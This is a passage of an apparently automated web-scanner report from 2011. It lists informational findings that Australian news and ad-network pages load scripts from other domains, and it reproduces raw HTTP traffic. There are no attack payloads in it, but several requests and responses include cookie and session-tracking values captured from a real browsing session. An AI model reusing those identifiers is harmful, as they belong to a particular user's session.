http://tags.mathtag.com/view/js/?strat=109185&cr=126413&supply=99&random=1315404918&rfr=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F7856%2F12590%2F22893%2D2%2Ehtml%3Fcb%3D0%2E5778487676288933&rfid=3444489&ymct=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGVjdlug0AMRX%2DIZZgFZoqiyiyNUAJpKhCCtzAgBRIKiaZZ%2DvVdoHmvH%2DxrX51ri7hcNAxbSDgE7yrRENcimFLS4FraGnJd1xYYU8Io1%2EyCI0g8FYB3yU4Z%2ENYqr1eT%2DukhQDFvFGALoX8R9%2DV8GTdwm6QPr93Mz97%2ERnCS178%2EEcB1om8t0t%2DCyHtkLSNWpodr0od0nW9ZkkcqTl%2DOsY9Y0iXtOpW0TOtDnBa3ss%2Ew5gHCQtP2So1PpjmMqu3bz6bWq7tx%2EqhaObyP56FrpDLk0Js70%2DHMNi3MBDIx5oLo2Nir%2EvgsqwUymONwyh3bsTH%2E9sgXI4xn%2Eg%3D%3D%2C

Request

Response

15.4. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3753.158901.DATAXU/B5319162.2;abr=!ie;sz=300x250;pc=[TPAS_ID];ord=1315404949?

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0229.rm.sp2
Set-Cookie: ih="b!!!!8!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!0=3rw8!0,R>!!!!*=3rw>!1-bB!!!!#=3f:x!1[PX!!!!#=3rwA!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2re:!!!!#=3rw:!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A!4el>!!!!#=3rw>"; path=/; expires=Fri, 06-Sep-2013 14:15:49 GMT
Set-Cookie: vuday1=%)0sHN0FYbjj_=i; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246e13fd8ece14cc1e8977faa9a; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=FA=ErN0FYbp=X2q; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:15:49 GMT
Pragma: no-cache
Content-Length: 1331
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8998917);}
</script><IFRAME SRC="htt
...[SNIP]...
ck.net/adi/N3753.158901.DATAXU/B5319162.2;sz=300x250;pc=[TPAS_ID];ord=1315404949?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3753.158901.DATAXU/B5319162.2;abr=!ie;sz=300x250;pc=[TPAS_ID];ord=1315404949?">
</SCRIPT>
...[SNIP]...

15.5. http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.news.yahoo.com
Path:	/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cm.au.thewest.overture.com/js_flat_1_0/?config=6518910550&source=thewest_y7news_au_ctxt&type=thewest_y7news&ctxtId=thewest_y7news&mkt=au&maxCount=3&keywordCharEnc=UTF8&outputCharEnc=UTF8&ctxtUrl=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F
http://l.yimg.com/ao/i/mp/js/loader/yuiloader.s1270.js
http://l.yimg.com/ao/i/sp/sponsored.js
http://l.yimg.com/ao/i/unihd/js/unihdjssav_2_26.js
http://l.yimg.com/d/ult/ylc_1.9.js
http://l.yimg.com/us.js.yimg.com/lib/npn/ulm30_1.26.js
http://l.yimg.com/zz/combo?d:mi/ywa.js&ao/i/mp/js/ywa/ywa.s1237.js
http://l.yimg.com/zz/combo?yui:3.3.0/build/yui/yui-min.js&yui:3.3.0/build/loader/loader-min.js&yui:3.3.0/build/oop/oop-min.js&yui:3.3.0/build/event-custom/event-custom-base-min.js&yui:3.3.0/build/event/event-base-min.js&yui:3.3.0/build/dom/dom-base-min.js&yui:3.3.0/build/dom/selector-native-min.js&yui:3.3.0/build/dom/selector-css2-min.js&yui:3.3.0/build/node/node-base-min.js&ao/i/mp/yui/yui3-aunz/loader/loader.s1324.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://yui.yahooapis.com/combo?2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&2.8.1/build/connection/connection-min.js&2.8.1/build/container/container-min.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: au_yloc=f_x5G1oWMpdaG8g_v7YfqdaDjDY92tkMKmLVvpwWykNLAJnRkDKXFk.DhINol4ybNtevxIZvvU9KJaDDoqE.YsgIpC3Xt0KkS2U.BBiNQ2mme_plYVEQtW2WpxAlp26H9Gz_pUlrkvp65TC0KDFkPAQ.hS_UXBmfhrRwAT9LrRi49tvQKiUfux504Bf7ozIwgrmvOJmnqjVlSS98_hoeHDgGDMoGrJkK3hNysRnvplpVDm0H5YIZC1gNRkOLsf7EPpEERY0s5_gBxRXK6V07s_XX2U_Td0Yu9.65dj824B6k3B5FFkncG3NMTXbzB0zQKCEnXwik5yvYdWGk6AkntYyJHyfQYWbnCCdjc9SkW2GSOeNBwvIHVsqJkJU0N9VFhy45PZUqhqaCYnFbtL.gwwYFvGyJXmoEAD2hLTgkskCP8aMjV7T7ow93kCgOrtvL3x27l_kjQW4YhVAZ9m5oylZKENTlJdA9zkFOewzpEAuFaPwzDerLSRPeY15ytANwy2IwzGrnx2WEYLAhzc6IOcm51hrTwnC5_lAfWvq416wqsjb41xM6x_RwGTi6qp8FynuRDn9Ho_4YoWHpBkSm1Db0WpssSx_j3MTpPtHIvGWtNsye2EUS0cp9XJOcV72hC2ABujbmPqq65nyVbFhLIliEMTZliPT5mivrhgv8CW2Gwg33filws8FDRpsuY_QjO8yHzcCA.Ebxx4oVnrjgMB3wRWMFtIdneV.kQ3NRULYXn.fyX1JXZ4iTyPZh1IGDA5Nm7pTNmQrpATFt; expires=Tue, 06-Dec-2011 14:15:33 GMT; path=/
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 58544

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-au">
   <head>
       <title>Wildcats abandon Bogut for Nevill - The West Australian</title>

...[SNIP]...
<link rel="stylesheet" href="http://l.yimg.com/ao/i/mp/properties/news/02/wan/css/wan.s893.css" type="text/css" media="all">

                   <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&2.8.1/build/connection/connection-min.js&2.8.1/build/container/container-min.js"></script>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?yui:3.3.0/build/yui/yui-min.js&yui:3.3.0/build/loader/loader-min.js&yui:3.3.0/build/oop/oop-min.js&yui:3.3.0/build/event-custom/event-custom-base-min.js&yui:3.3.0/build/event/event-base-min.js&yui:3.3.0/build/dom/dom-base-min.js&yui:3.3.0/build/dom/selector-native-min.js&yui:3.3.0/build/dom/selector-css2-min.js&yui:3.3.0/build/node/node-base-min.js&ao/i/mp/yui/yui3-aunz/loader/loader.s1324.js"></script>
...[SNIP]...
</style><script src="http://l.yimg.com/us.js.yimg.com/lib/npn/ulm30_1.26.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://l.yimg.com/ao/i/sp/sponsored.js"></script>
...[SNIP]...
</form><script type="text/javascript" src="http://l.yimg.com/ao/i/unihd/js/unihdjssav_2_26.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://l.yimg.com/d/ult/ylc_1.9.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<ul id="yahooPN_CM">

<script type="text/javascript" src="http://cm.au.thewest.overture.com/js_flat_1_0/?config=6518910550&source=thewest_y7news_au_ctxt&type=thewest_y7news&ctxtId=thewest_y7news&mkt=au&maxCount=3&keywordCharEnc=UTF8&outputCharEnc=UTF8&ctxtUrl=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F"></script>
...[SNIP]...

<script src="http://l.yimg.com/zz/combo?d:mi/ywa.js&ao/i/mp/js/ywa/ywa.s1237.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://l.yimg.com/ao/i/mp/js/loader/yuiloader.s1270.js"></script>
...[SNIP]...

15.6. http://au.news.yahoo.com/thewest/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.news.yahoo.com
Path:	/thewest/business/

Issue detail

The response dynamically includes the following scripts from other domains:

http://l.yimg.com/ao/i/mp/js/loader/yuiloader.s1270.js
http://l.yimg.com/ao/i/unihd/js/unihdjssav_2_26.js
http://l.yimg.com/d/ult/ylc_1.9.js
http://l.yimg.com/us.js.yimg.com/lib/npn/ulm30_1.26.js
http://l.yimg.com/zz/combo?d:mi/ywa.js&ao/i/mp/js/ywa/ywa.s1237.js
http://l.yimg.com/zz/combo?yui:3.3.0/build/yui/yui-min.js&yui:3.3.0/build/loader/loader-min.js&yui:3.3.0/build/oop/oop-min.js&yui:3.3.0/build/event-custom/event-custom-base-min.js&yui:3.3.0/build/event/event-base-min.js&yui:3.3.0/build/dom/dom-base-min.js&yui:3.3.0/build/dom/selector-native-min.js&yui:3.3.0/build/dom/selector-css2-min.js&yui:3.3.0/build/node/node-base-min.js&ao/i/mp/yui/yui3-aunz/loader/loader.s1324.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://yui.yahooapis.com/combo?2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&2.8.1/build/connection/connection-min.js&2.8.1/build/container/container-min.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: au_yloc=f_x5G1oWMpdaG8g_v7YfqdaDjDY92tkMKmLVvpwWykNLAJnRkDKXFk.DhINol4ybNtevxIZvvU9KJaDDoqE.YsgIpC3Xt0KkS2U.BBiNQ2mme_plYVEQtW2WpxAlp26H9Gz_pUlrkvp65TC0KDFkPAQ.hS_UXBmfhrRwAT9LrRi49tvQKiUfux504Bf7ozIwgrmvOJmnqjVlSS98_hoeHDgGDMoGrJkK3hNysRnvplpVDm0H5YIZC1gNRkOLsf7EPpEERY0s5_gBxRXK6V07s_XX2U_Td0Yu9.65dj824B6k3B5FFkncG3NMTXbzB0zQKCEnXwik5yvYdWGk6AkntYyJHyfQYWbnCCdjc9SkW2GSOeNBwvIHVsqJkJU0N9VFhy45PZUqhqaCYnFbtL.gwwYFvGyJXmoEAD2hLTgkskCP8aMjV7T7ow93kCgOrtvL3x27l_kjQW4YhVAZ9m5oylZKENTlJdA9zkFOewzpEAuFaPwzDerLSRPeY15ytANwy2IwzGrnx2WEYLAhzc6IOcm51hrTwnC5_lAfWvq416wqsjb41xM6x_RwGTi6qp8FynuRDn9Ho_4YoWHpBkSm1Db0WpssSx_j3MTpPtHIvGWtNsye2EUS0cp9XJOcV72hC2ABujbmPqq65nyVbFhLIliEMTZliPT5mivrhgv8CW2Gwg33filws8FDRpsuY_QjO8yHzcCA.Ebxx4oVnrjgMB3wRWMFtIdneV.kQ3NRULYXn.fyX1JXZ4iTyPZh1IGDA5Nm7pTNmQrpATFt; expires=Tue, 06-Dec-2011 14:17:19 GMT; path=/
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 109100

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-au">
   <head>
       <title>Business - The West Australian</title>

<meta name="keywords"
...[SNIP]...
<link rel="stylesheet" href="http://l.yimg.com/ao/i/mp/properties/news/02/css/wan-business.r1.3.css" type="text/css" media="all">

               <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&2.8.1/build/connection/connection-min.js&2.8.1/build/container/container-min.js"></script>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?yui:3.3.0/build/yui/yui-min.js&yui:3.3.0/build/loader/loader-min.js&yui:3.3.0/build/oop/oop-min.js&yui:3.3.0/build/event-custom/event-custom-base-min.js&yui:3.3.0/build/event/event-base-min.js&yui:3.3.0/build/dom/dom-base-min.js&yui:3.3.0/build/dom/selector-native-min.js&yui:3.3.0/build/dom/selector-css2-min.js&yui:3.3.0/build/node/node-base-min.js&ao/i/mp/yui/yui3-aunz/loader/loader.s1324.js"></script>
...[SNIP]...
</style><script src="http://l.yimg.com/us.js.yimg.com/lib/npn/ulm30_1.26.js"></script>
...[SNIP]...
</form><script type="text/javascript" src="http://l.yimg.com/ao/i/unihd/js/unihdjssav_2_26.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://l.yimg.com/d/ult/ylc_1.9.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://l.yimg.com/zz/combo?d:mi/ywa.js&ao/i/mp/js/ywa/ywa.s1237.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://l.yimg.com/ao/i/mp/js/loader/yuiloader.s1270.js"></script>
...[SNIP]...

15.7. http://au.pfinance.yahoo.com/compare/distribution/wan-widget/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.pfinance.yahoo.com
Path:	/compare/distribution/wan-widget/

Issue detail

The response dynamically includes the following script from another domain:

http://l.yimg.com/ao/i/mp/js/loader/yuiloader.s1270.js

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The response dynamically includes the following script from another domain:

http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=0651551808&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c4d,0651551808,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The response dynamically includes the following script from another domain:

http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=8251023631&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=68910242=_4e677cd7,8251023631,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=68910242/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The response dynamically includes the following script from another domain:

http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=1608123674&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c45,1608123674,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=

Request

Response

15.11. http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.smh.com.au
Path:	/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://secure-au.imrworldwide.com/v60.js

Request

GET /breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html HTTP/1.1
Host: news.smh.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 07 Sep 2011 14:14:44 GMT
Pragma: no-cache
X-Cnection: close
Content-Language: en-AU
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 103304
Content-Type: text/html;charset=UTF-8
Expires: Wed, 07 Sep 2011 14:15:25 GMT
Date: Wed, 07 Sep 2011 14:15:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
uses the parameter values assigned above to populate an array of
ad objects. Once that array has been populated, the JavaScript will call the google_ad_request_done function to display
the ads. -->
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

<script type="text/javascript" src="//secure-au.imrworldwide.com/v60.js"></script>
...[SNIP]...

15.12. http://news.smh.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.smh.com.au
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://secure-au.imrworldwide.com/v60.js

Request

GET /favicon.ico HTTP/1.1
Host: news.smh.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422900111; k_visit=1; __utma=251652569.1383434366.1315422949.1315422949.1315422949.1; __utmb=251652569.1.10.1315422949; __utmc=251652569; __utmz=251652569.1315422949.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Wed, 07 Sep 2011 14:18:48 GMT
Pragma: no-cache
X-Cnection: close
Content-Language: en-AU
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 67059
Content-Type: text/html;charset=UTF-8
Expires: Wed, 07 Sep 2011 14:18:48 GMT
Date: Wed, 07 Sep 2011 14:18:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

<script type="text/javascript" src="//secure-au.imrworldwide.com/v60.js"></script>
...[SNIP]...

15.13. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=1fd7d168-dd1e-413a-b4da-376f0e23c438&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOhTAMQ6.CMlOpqdM0cBsgMCE2JvTv_pPJ70m2PwJonRZrinkitBAD2NI4hPjy4axW3PkswtjKLr4VDL3q2XAIjHKa5dFbHWn5s0T2SKmwQAl83vsO1ECOatffH_YwG2M-%26redirectURL%3D

Request

GET /a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^5&12590^4; csi2=3165011.js^2^1315404895^1315404918&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7856/12590; rdk2=0; ses2=12338^7&12590^3

Response

15.14. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=4b1c2d40-76a1-493d-8cf6-6625bb9f7a98&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOwzAMQ68SaK4B62NZ6m3iBJmCbJ2K3r3UxPcAkl9SpfeWIa6vjVQgocpRxhCyxYec1tv0nZulni2Oy5u7jLXymnsG1bTKc0ifZfWTyIG0rgE04PO5b6ADGdXhvz_YKhsX%26redirectURL%3D

Request

GET /a/7856/12590/22782-15.html?cb=0.39881858555600047&keyword=smh/business_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
